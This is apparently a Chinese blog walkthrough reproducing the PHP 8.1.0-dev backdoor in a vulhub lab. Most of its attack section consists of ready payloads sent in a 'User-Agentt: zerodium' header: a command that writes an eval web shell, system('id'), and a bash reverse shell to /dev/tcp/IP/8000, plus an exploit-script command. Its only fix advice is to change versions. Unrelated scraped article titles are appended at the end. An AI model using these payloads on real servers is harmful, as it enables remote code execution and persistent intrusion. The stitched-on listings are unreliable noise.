0x01 简介

PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。

0x02 影响版本

PHP 8.1.0-dev

0x03 环境搭建

使用vulhub进行搭建:

cd vulhub/php/8.1-backdoor
sudo docker-compose up -d

访问主页:

http://ip:8080

0x04 漏洞复现

后门存在于user-agentt:zerodium字段,后面加上相应的php函数,得到执行结果:

我们再来查看phpinfo(),通过浏览器插件Modify Header,点击Open options page,修改该网站的Headers:

再来执行写入shell:

User-Agentt: zerodiumfile_put_contents('indes.php','<?php eval($_POST["xx11"]);?>');

连接成功:

执行命令:

User-Agentt: zerodiumsystem("id");

反弹shell:

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/IP/8000 0>&1'");

EXP:

python3 PHP-8.1.0-dev-Backdoor-RCE.py -u http://ip:8080 -c id

exp后台回复php-8.1.0-dev获取。

0x05修复建议

1、建议更换版本

长按下方图片关注我们:

PHP 8.1.0-dev后门复现相关推荐

  1. npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! test_vue_0613@1.0.0 dev: 错误的解决方法

    npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! test_vue_0613@1.0.0 dev: 错误的解决方法 参考文章: (1)npm ERR ...

  2. device:GPU:0 but available devices are [ /job:localhost/replica:0/task:0/dev

     device:GPU:0 but available devices are [ /job:localhost/replica:0/task:0/dev 解决方法: sess = tf.Sess ...

  3. @1.0.0 dev: `webpack-dev-server --inline --progress --config

    以前写的工作室官网项目,本来能运行起来的,隔了很久之后,中间还重做了一次系统,今天重新运行竟然运行不起来了. 报错: Matrix-official@1.0.0 dev: `webpack-dev-s ...

  4. metinfov5.0.4漏洞复现

    metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简 ...

  5. vue端口号被占用报错npm ERR! @1.0.0 dev: `node build/dev-server.js`

    本群面相web开发爱好者以及同行,共同探讨研究技术,分享交流经验,帮助新人成长,大牛技术精进,js发展日新月异闭门造车是没有出路的,有问必答,共同进步.求职招聘qq群 626448857 附前后端技术 ...

  6. npm ERR! code ELIFECYCLEnpm ERR! errno 1npm ERR! wlwl-dsfvue@1.0.0 dev: `node build/dev-server.js`报错

    npm run dev报错如下 internal/modules/cjs/loader.js:883   throw err;   ^ Error: Cannot find module '../co ...

  7. vue:hadoop@1.0.0 dev: `webpack-dev-server --inline --progress --config build/webpack.dev.conf.js

    运行vue项目是报错: hadoop@1.0.0 dev: `webpack-dev-server --inline --progress --config build/webpack.dev.con ...

  8. 记一次前端启动报错npm ERR! 12@1.0.0 dev: `webpack-dev-server --inline --progress --config build/webpack.dev.c

    问题: npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! 12@1.0.0 dev: `webpack-dev-server --inline -- ...

  9. PR、巴西烤肉、iis6.0提权复现

    PR.巴西烤肉.iis6.0提权复现 大多数的时候,如果我们上传了一句话木马之后,想要进一步操作.比如,创建新用户,查看当前身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限, ...

  10. 在终端输入npm run serve时出现npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR! test_vue_0613@1.0.0 dev: 错误的

    最近遇到了一个问题,废了我九牛二虎之力终于给他解决了,原因竟然是这个 有的人用的是用的是mac,有的人用的是windows,所以苹果系统有时候为了兼容会安装一些依赖包 (比如:fsevents),而有 ...

最新文章

  1. Mysql数据库按照varchar字符串类型排序和按照int整型类型排序的区别和注意点及解决方案...
  2. html左侧分级导航,jquery实现无限分级横向导航菜单的方法
  3. Tomcat启动过程中找不到JAVA_HOME解决方法
  4. 狼人杀服务器维护时间,狼人杀官 方将于11月30日进行停机维护
  5. 在实践中使用延迟队列
  6. 剑指Offer - 面试题15. 二进制中1的个数(位运算)
  7. AJAX实现瀑布流布局
  8. java8的下载与安装(网上教程的安装方法)
  9. 数据库系统概念第七版(Database System Concepts 7th)课后习题答案英文版
  10. 从创业者角度看《印度合伙人 Padman》后的一点感受
  11. 学3D建模,都需要哪些基础?
  12. 中国茶道的基本精神(转)
  13. 内外兼修:程序员的成长之路+软技能 代码之外的生存指南
  14. CSS圆角边框、盒子阴影、文字阴影(01-07课)
  15. mongodb 基于3千万条数据, 查询30万结果集,分页问题
  16. 矩阵的乘法口诀(一)
  17. hackmyvm-bunny walkthrough
  18. vsftp配置详解篇
  19. mysql md5 多少位_mysql的MD5加密后的字符能不能设定长度
  20. GNSS/INS松组合算法原理简介

热门文章

  1. 红米2 com.android.phone,红米2手机(移动/联通/电信) 7.1 ROM 下载地址搬运(2017年3月10日更新)...
  2. python输出好看的表格
  3. 计算机本科生科研训练计划表,大学本科生科研训练计划(srtp)(10页)-原创力文档...
  4. 微信小程序开发和APP开发有哪些区别
  5. 原生小程序 申请小程序 - 发布流程
  6. 开工大吉 | Cocos Store 精品资源推荐
  7. 24点计算器问题[C++实现]
  8. 手机怎样设置一个高考倒计时便签,可以天天看见那种
  9. linux之打包压缩(tar,gz,bz2,xz,zip)
  10. oracle计算sql运行时间,如何计算正在运行的SQL已经执行的时间?